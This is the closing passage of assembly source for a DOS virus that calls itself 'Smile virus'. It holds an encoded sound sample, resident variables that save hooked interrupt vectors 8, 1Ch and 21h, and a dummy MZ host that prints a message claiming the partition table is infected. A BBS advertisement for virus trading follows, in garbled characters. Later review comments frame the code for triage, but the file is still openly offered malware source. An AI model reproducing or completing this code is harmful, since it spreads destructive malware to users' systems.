|
|||
|
db 99,102,147,248,205,156,119,142,156,126, 76, 12,110, 77,152,236
|
|||
|
db 198, 56,102,102,120,220,243, 76,206,100,152,198, 49,153,152, 60
|
|||
|
db 223, 28,189, 55, 25,198, 15, 60,114, 14, 25, 51,207, 50,227, 19
|
|||
|
db 36, 67,223,102,199, 92,102,131, 4,100,115,126,236,214, 48,108
|
|||
|
db 77,191,204, 6,124,253,152, 32,255,136, 78,243,128,127,240, 59
|
|||
|
db 255, 0, 63,252, 15,251,192, 31,254, 3,255,192, 31,254, 3,255
|
|||
|
db 192, 63,252, 15,127, 0,127,240, 3, 16, 7,255,240, 32, 15,251
|
|||
|
|
|||
|
SampleEnd equ this byte
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Variables
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Resident state. All three fields start as -1 (all bits set); the code that
; reads and updates them is outside this view.
; NOTE(review): the names suggest an activation flag plus a stored year and
; date -- confirm against the code that writes them.
Active db -1
|
|||
|
ActiveYear dw -1
|
|||
|
ActiveDate dw -1
|
|||
|
|
|||
|
; Saved copies of interrupt vectors 8, 1Ch and 21h. Each "equ this dword"
; label names the two words that follow it as a single 32-bit far pointer.
; The "o"/"s" suffixes match the offset-then-segment pairs declared for the
; live vectors in iseg at the top of the file.
; NOTE(review): keeping the previous handlers for these three vectors implies
; the resident code replaces them (the hooking code is outside this view).
; When triaging an affected DOS system, these are the vectors to compare
; against known-good values.
OldInt8 equ this dword ; original interrupt 8 (far pointer)
|
|||
|
OldInt8o dw -1
|
|||
|
OldInt8s dw -1
|
|||
|
OldInt1C equ this dword ; original interrupt 1ch (far pointer)
|
|||
|
OldInt1Co dw -1
|
|||
|
OldInt1Cs dw -1
|
|||
|
OldInt21 equ this dword ; original interrupt 21h (far pointer)
|
|||
|
OldInt21o dw -1
|
|||
|
OldInt21s dw -1
|
|||
|
|
|||
|
; Timer and sound playback state.
; NOTE(review): SampleOffset/SampleBit presumably index into the sample table
; that ends at SampleEnd -- confirm against the timer handler.
Count dw -1 ; timer count
|
|||
|
SampleOffset dw -1 ; used to make sound
|
|||
|
SampleBit db -1
|
|||
|
SampleFlag db -1
|
|||
|
; 24 one-byte slots, each initialised to -1.
Handle db 24 dup(-1) ; file handles
|
|||
|
|
|||
|
cseg ends
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Original EXE-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Dummy host program linked after the virus body. It consists of an MZ-style
; header laid out as data, a few instructions that print Warning and exit,
; and the Warning text itself.
; By byte count (1Ch header + 0Eh code + 49h text) this segment assembles to
; 73h bytes, the value of PrgSize; the file header says a wrong size constant
; hangs infected files, so the layout below is kept exactly as written.
; NOTE(review): the warning text belongs to this dummy host, so as a scanning
; string it presumably identifies the first-generation carrier rather than
; every infected file -- verify before relying on it as a signature.
mseg segment public 'code'
|
|||
|
assume cs:mseg, ds:mseg, es:mseg
|
|||
|
|
|||
|
|
|||
|
; --- MZ header fields, in file order ---
db 'MZ' ; header signature
|
|||
|
dw PrgSize ; PartPage: bytes used in the last page
|
|||
|
dw 1 ; PageCount
|
|||
|
dw 0 ; relocation items = 0
|
|||
|
dw 0 ; headersize = 0h
|
|||
|
dw 80h ; minimum memory
|
|||
|
dw 0ffffh ; maximum memory
|
|||
|
dw (PrgSize+15)/10h ; ss: PrgSize rounded up to whole paragraphs
|
|||
|
dw 7feh ; sp
|
|||
|
dw 0 ; chksum
|
|||
|
dw offset Orginal ; ip: entry point is the Orginal label below
|
|||
|
dw 0 ; cs
|
|||
|
dw 1ch ; offset relocation table
|
|||
|
dw 0 ; overlay number
|
|||
|
|
|||
|
; --- Host code: print the warning, then exit ---
Orginal: mov ah,9 ; DOS function 9: print '$'-terminated string at ds:dx
|
|||
|
push cs
|
|||
|
pop ds ; ds = cs, the string lives in this segment
|
|||
|
mov dx,offset Warning
|
|||
|
int 21h
|
|||
|
mov ax,4c00h ; DOS function 4Ch, return code 0
|
|||
|
int 21h ; terminate
|
|||
|
|
|||
|
; Message text; 13,10 is CR LF and the final '$' is the terminator that
; DOS function 9 stops at.
Warning db 13,10
|
|||
|
db 'WARNING:',13,10
|
|||
|
db 13,10
|
|||
|
db 'Smile virus has now infected the partition table !!!!!',13,10
|
|||
|
db 13,10
|
|||
|
db '$'
|
|||
|
|
|||
|
mseg ends
|
|||
|
|
|||
|
; Stack segment for the assembled program: 800h uninitialised bytes.
sseg segment stack 'stack'
|
|||
|
db 800h dup(?) ; reserved only, no initial contents
|
|||
|
sseg ends
|
|||
|
|
|||
|
end Main
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|